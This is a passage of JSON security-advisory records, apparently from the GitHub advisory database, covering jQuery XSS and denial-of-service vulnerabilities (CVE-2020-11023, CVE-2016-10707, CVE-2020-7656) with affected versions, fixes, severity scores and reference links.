"https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AVKYXLWCLZBV2N7M46KYK4LVA5OXWPBY" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QPN2L2XVQGUA2V5HNQJWHK3APSK3VN7K" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SAPQVX3XDNPGFT26QAQ6AJIXZZBZ4CD4" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/162159/jQuery-1.2-Cross-Site-Scripting.html" } ], 
"database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2020-04-29T22:18:37Z", "nvd_published_at": "2020-04-29T22:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-jpcq-cgw6-v4j6", "published": "2020-04-29T22:19:14Z", "modified": "2025-10-22T19:26:30.488832Z", "aliases": [ "BIT-drupal-2020-11023", "CVE-2020-11023" ], "related": [ "CVE-2020-11023" ], "summary": "Potential XSS vulnerability in jQuery", "details": "### Impact\nPassing HTML containing `\u003coption\u003e` elements from untrusted sources - even after sanitizing them - to one of jQuery's DOM manipulation methods (i.e. `.html()`, `.append()`, and others) may execute untrusted code.\n\n### Patches\nThis problem is patched in jQuery 3.5.0.\n\n### Workarounds\nTo workaround this issue without upgrading, use [DOMPurify](https://github.com/cure53/DOMPurify) with its `SAFE_FOR_JQUERY` option to sanitize the HTML string before passing it to a jQuery method.\n\n### References\nhttps://blog.jquery.com/2020/04/10/jquery-3-5-0-released/\n\n### For more information\nIf you have any questions or comments about this advisory, search for a relevant issue in [the jQuery repo](https://github.com/jquery/jquery/issues). 
If you don't find an answer, open a new issue.", "affected": [ { "package": { "name": "jquery", "ecosystem": "npm", "purl": "pkg:npm/jquery" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.0.3" }, { "fixed": "3.5.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-jpcq-cgw6-v4j6/GHSA-jpcq-cgw6-v4j6.json" } }, { "package": { "name": "jquery-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/jquery-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.4.0" } ] } ], "versions": [ "0.1.1", "0.1.2", "0.1.3", "0.2", "0.2.1", "0.2.2", "0.2.3", "0.2.4", "0.2.5", "0.2.6", "0.2.7", "1.0", "1.0.1", "1.0.10", "1.0.11", "1.0.12", "1.0.13", "1.0.14", "1.0.15", "1.0.16", "1.0.17", "1.0.18", "1.0.19", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "1.0.9", "1.0.rc", "2.0.1", "2.0.2", "2.0.3", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.3.0", "3.0.0", "3.0.1", "3.0.2", "3.0.3", "3.0.4", "3.1.0", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.1.5", "4.0.0", "4.0.0.beta1", "4.0.0.beta2", "4.0.1", "4.0.2", "4.0.3", "4.0.4", "4.0.5", "4.1.0", "4.1.1", "4.2.0", "4.2.1", "4.2.2", "4.3.0", "4.3.1", "4.3.2", "4.3.3", "4.3.4", "4.3.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-jpcq-cgw6-v4j6/GHSA-jpcq-cgw6-v4j6.json" } }, { "package": { "name": "jQuery", "ecosystem": "NuGet", "purl": "pkg:nuget/jQuery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0.3" }, { "fixed": "3.5.0" } ] } ], "versions": [ "1.10.0", "1.10.0.1", "1.10.1", "1.10.2", "1.11.0", "1.11.1", "1.11.2", "1.11.3", "1.12.0", "1.12.1", "1.12.2", "1.12.3", "1.12.4", "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.5.0", "1.5.1", "1.5.2", "1.6.0", "1.6.1", "1.6.2", "1.6.3", "1.6.4", "1.7.0", "1.7.1", "1.7.1.1", "1.7.2", "1.8.0", "1.8.1", "1.8.2", 
"1.8.3", "1.9.0", "1.9.1", "2.0.0", "2.0.1", "2.0.1.1", "2.0.2", "2.0.3", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "3.0.0", "3.0.0.1", "3.1.0", "3.1.1", "3.2.1", "3.3.1", "3.4.0", "3.4.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-jpcq-cgw6-v4j6/GHSA-jpcq-cgw6-v4j6.json" } }, { "package": { "name": "org.webjars.npm:jquery", "ecosystem": "Maven", "purl": "pkg:maven/org.webjars.npm/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0.3" }, { "fixed": "3.5.0" } ] } ], "versions": [ "1.11.0", "1.11.1", "1.11.3", "1.12.1", "1.12.2", "1.12.3", "1.12.4", "1.7.2", "1.7.3", "1.8.2", "1.8.3", "1.9.1", "2.1.0", "2.1.1", "2.1.1-rc1", "2.1.1-rc2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "3.0.0", "3.0.0-alpha1", "3.0.0-beta1", "3.0.0-rc1", "3.1.0", "3.1.1", "3.2.0", "3.2.1", "3.3.0", "3.3.1", "3.4.0", "3.4.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-jpcq-cgw6-v4j6/GHSA-jpcq-cgw6-v4j6.json" } }, { "package": { "name": "components/jquery", "ecosystem": "Packagist", "purl": "pkg:composer/components/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0.3" }, { "fixed": "3.5.0" } ] } ], "versions": [ "1.10.0", "1.10.1", "1.10.2", "1.11.0", "1.11.1", "1.11.2", "1.11.3", "1.12.0", "1.12.1", "1.12.4", "1.8.3", "1.9.0", "1.9.1", "2.0.0", "2.0.1", "2.0.2", "2.0.3", "2.1.0", "2.1.1", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.4", "3.0.0", "3.1.0", "3.1.1", "3.2.0", "3.2.1", "3.3.1", "3.4.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-jpcq-cgw6-v4j6/GHSA-jpcq-cgw6-v4j6.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/jquery/jquery/security/advisories/GHSA-jpcq-cgw6-v4j6" }, { "type": 
"ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11023" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rda99599896c3667f2cc9e9d34c7b6ef5d2bbed1f4801e1d75a2b0679@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf0f8939596081d84be1ae6a91d6248b96a02d8388898c372ac807817%40%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf0f8939596081d84be1ae6a91d6248b96a02d8388898c372ac807817@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1ba79e564fe7efc56aef7c986106f1cf67a3427d08e997e088e7a93%40%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1ba79e564fe7efc56aef7c986106f1cf67a3427d08e997e088e7a93@%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rf661a90a15da8da5922ba6127b3f5f8194d4ebec8855d60a0dd13248%40%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf661a90a15da8da5922ba6127b3f5f8194d4ebec8855d60a0dd13248@%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://www.tenable.com/security/tns-2021-10" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rda99599896c3667f2cc9e9d34c7b6ef5d2bbed1f4801e1d75a2b0679%40%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd38b4185a797b324c8dd940d9213cf99fcdc2dbf1fc5a63ba7dee8c9@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd38b4185a797b324c8dd940d9213cf99fcdc2dbf1fc5a63ba7dee8c9%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67%40%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb69b7d8217c1a6a2100247a5d06ce610836b31e3f5d73fc113ded8e7@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb69b7d8217c1a6a2100247a5d06ce610836b31e3f5d73fc113ded8e7%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb25c3bc7418ae75cba07988dafe1b6912f76a9dd7d94757878320d61@%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb25c3bc7418ae75cba07988dafe1b6912f76a9dd7d94757878320d61%40%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/radcb2aa874a79647789f3563fcbbceaf1045a029ee8806b59812a8ea@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/radcb2aa874a79647789f3563fcbbceaf1045a029ee8806b59812a8ea%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rab82dd040f302018c85bd07d33f5604113573514895ada523c3401d9@%3Ccommits.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rab82dd040f302018c85bd07d33f5604113573514895ada523c3401d9%40%3Ccommits.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra406b3adfcffcb5ce8707013bdb7c35e3ffc2776a8a99022f15274c6@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4aadb98086ca72ed75391f54167522d91489a0d0ae25b12baa8fc7c5@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://www.tenable.com/security/tns-2021-02" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.drupal.org/sa-core-2020-002" }, { "type": "WEB", "url": "https://www.debian.org/security/2020/dsa-4693" }, { "type": "WEB", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-11023" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-JQUERY-565129" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-DOTNET-JQUERY-565440" }, { 
"type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230725-0003" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200511-0006" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202007-03" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SFP4UK4EGP4AFH2MWYJ5A5Z4I7XVFQ6B" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SAPQVX3XDNPGFT26QAQ6AJIXZZBZ4CD4" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QPN2L2XVQGUA2V5HNQJWHK3APSK3VN7K" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AVKYXLWCLZBV2N7M46KYK4LVA5OXWPBY" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SFP4UK4EGP4AFH2MWYJ5A5Z4I7XVFQ6B" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SAPQVX3XDNPGFT26QAQ6AJIXZZBZ4CD4" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QPN2L2XVQGUA2V5HNQJWHK3APSK3VN7K" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AVKYXLWCLZBV2N7M46KYK4LVA5OXWPBY" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4aadb98086ca72ed75391f54167522d91489a0d0ae25b12baa8fc7c5%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3702ede0ff83a29ba3eb418f6f11c473d6e3736baba981a8dbd9c9ef@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3702ede0ff83a29ba3eb418f6f11c473d6e3736baba981a8dbd9c9ef%40%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2c85121a47442036c7f8353a3724aa04f8ecdfda1819d311ba4f5330@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2c85121a47442036c7f8353a3724aa04f8ecdfda1819d311ba4f5330%40%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1fed19c860a0d470f2a3eded12795772c8651ff583ef951ddac4918c@%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1fed19c860a0d470f2a3eded12795772c8651ff583ef951ddac4918c%40%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r094f435595582f6b5b24b66fedf80543aa8b1d57a3688fbcc21f06ec@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r094f435595582f6b5b24b66fedf80543aa8b1d57a3688fbcc21f06ec%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r07ab379471fb15644bf7a92e4a98cbc7df3cf4e736abae0cc7625fe6@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r07ab379471fb15644bf7a92e4a98cbc7df3cf4e736abae0cc7625fe6%40%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0593393ca1e97b1e7e098fe69d414d6bd0a467148e9138d07e86ebbb@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r0593393ca1e97b1e7e098fe69d414d6bd0a467148e9138d07e86ebbb%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://jquery.com/upgrade-guide/3.5" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2020-23064.yml" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2020-11023.yml" }, { "type": "WEB", "url": "https://github.com/rails/jquery-rails/blob/v4.4.0/vendor/assets/javascripts/jquery3.js#L6162" }, { "type": "WEB", "url": "https://github.com/rails/jquery-rails/blob/v4.3.5/vendor/assets/javascripts/jquery3.js#L5979" }, { "type": "WEB", "url": "https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#440" }, { "type": "WEB", "url": "https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#410" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/releases/tag/3.5.0" }, { "type": "PACKAGE", "url": "https://github.com/jquery/jquery" }, { "type": "WEB", "url": "https://github.com/github/advisory-database/blob/99afa6fdeaf5d1d23e1021ff915a5e5dbc82c1f1/advisories/github-reviewed/2020/04/GHSA-jpcq-cgw6-v4j6/GHSA-jpcq-cgw6-v4j6.json#L20-L37" }, { "type": "WEB", "url": "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra406b3adfcffcb5ce8707013bdb7c35e3ffc2776a8a99022f15274c6%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra3c9219fcb0b289e18e9ec5a5ebeaa5c17d6b79a201667675af6721c@%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/ra3c9219fcb0b289e18e9ec5a5ebeaa5c17d6b79a201667675af6721c%40%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra374bb0299b4aa3e04edde01ebc03ed6f90cf614dad40dd428ce8f72@%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra374bb0299b4aa3e04edde01ebc03ed6f90cf614dad40dd428ce8f72%40%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra32c7103ded9041c7c1cb8c12c8d125a6b2f3f3270e2937ef8417fac@%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra32c7103ded9041c7c1cb8c12c8d125a6b2f3f3270e2937ef8417fac%40%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9e0bd31b7da9e7403478d22652b8760c946861f8ebd7bd750844898e@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9e0bd31b7da9e7403478d22652b8760c946861f8ebd7bd750844898e%40%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9c5fda81e4bca8daee305b4c03283dddb383ab8428a151d4cb0b3b15@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9c5fda81e4bca8daee305b4c03283dddb383ab8428a151d4cb0b3b15%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9006ad2abf81d02a0ef2126bab5177987e59095b7194a487c4ea247c@%3Ccommits.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9006ad2abf81d02a0ef2126bab5177987e59095b7194a487c4ea247c%40%3Ccommits.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", 
"url": "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6e97b37963926f6059ecc1e417721608723a807a76af41d4e9dbed49@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6e97b37963926f6059ecc1e417721608723a807a76af41d4e9dbed49%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6c4df3b33e625a44471009a172dabe6865faec8d8f21cac2303463b1@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6c4df3b33e625a44471009a172dabe6865faec8d8f21cac2303463b1%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r55f5e066cc7301e3630ce90bbbf8d28c82212ae1f2d4871012141494@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r55f5e066cc7301e3630ce90bbbf8d28c82212ae1f2d4871012141494%40%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4dba67be3239b34861f1b9cfdf9dfb3a90272585dcce374112ed6e16@%3Cdev.felix.apache.org%3E" }, { "type": 
"WEB", "url": "https://lists.apache.org/thread.html/r4dba67be3239b34861f1b9cfdf9dfb3a90272585dcce374112ed6e16%40%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/162160/jQuery-1.0.3-Cross-Site-Scripting.html" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2020-04-29T21:04:50Z", "nvd_published_at": "2020-04-29T21:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N/E:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mhpp-875w-9cpv", "published": "2018-01-22T13:32:42Z", "modified": "2025-09-02T22:35:01Z", "aliases": [ "CVE-2016-10707" ], "summary": "Denial of Service in jquery", "details": "Affected versions of `jquery` use a lowercasing logic on attribute names. 
When given a boolean attribute with a name that contains uppercase characters, `jquery` enters into an infinite recursion loop, exceeding the call stack limit, and resulting in a denial of service condition.\n\n\n## Recommendation\n\nUpdate to version 3.0.0 or later.", "affected": [ { "package": { "name": "jquery", "ecosystem": "npm", "purl": "pkg:npm/jquery" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0-rc.1" }, { "fixed": "3.0.0" } ] } ], "versions": [ "3.0.0-rc.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-mhpp-875w-9cpv/GHSA-mhpp-875w-9cpv.json" } }, { "package": { "name": "jQuery", "ecosystem": "NuGet", "purl": "pkg:nuget/jQuery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0-rc.1" }, { "fixed": "3.0.0" } ] } ], "versions": [ "3.0.0-rc.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-mhpp-875w-9cpv/GHSA-mhpp-875w-9cpv.json" } }, { "package": { "name": "org.webjars.npm:jquery", "ecosystem": "Maven", "purl": "pkg:maven/org.webjars.npm/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0-rc1" }, { "fixed": "3.0.0" } ] } ], "versions": [ "3.0.0-rc1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-mhpp-875w-9cpv/GHSA-mhpp-875w-9cpv.json" } }, { "package": { "name": "jquery-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/jquery-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0-rc.1" }, { "fixed": "3.0.0" } ] } ], "versions": [ "3.0.0-rc.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-mhpp-875w-9cpv/GHSA-mhpp-875w-9cpv.json" } } ], "references": [ { "type": "ADVISORY", "url": 
"https://nvd.nist.gov/vuln/detail/CVE-2016-10707" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/issues/3133" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/issues/3133#issuecomment-358978489" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/pull/3134" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mhpp-875w-9cpv" }, { "type": "PACKAGE", "url": "https://github.com/jquery/jquery" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2016-10707.yml" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:jquery:20160529" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/330" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-674" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:46:22Z", "nvd_published_at": "2018-01-18T23:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-q4m3-2j7h-f7xw", "published": "2020-05-20T16:18:01Z", "modified": "2025-01-14T08:57:21.902958Z", "aliases": [ "CVE-2020-7656" ], "summary": "Cross-Site Scripting in jquery", "details": "Versions of `jquery` prior to 1.9.0 are vulnerable to Cross-Site Scripting. The load method fails to recognize and remove `\u003cscript\u003e` HTML tags that contain a whitespace character, i.e: `\u003c/script \u003e`, which results in the enclosed script logic to be executed. 
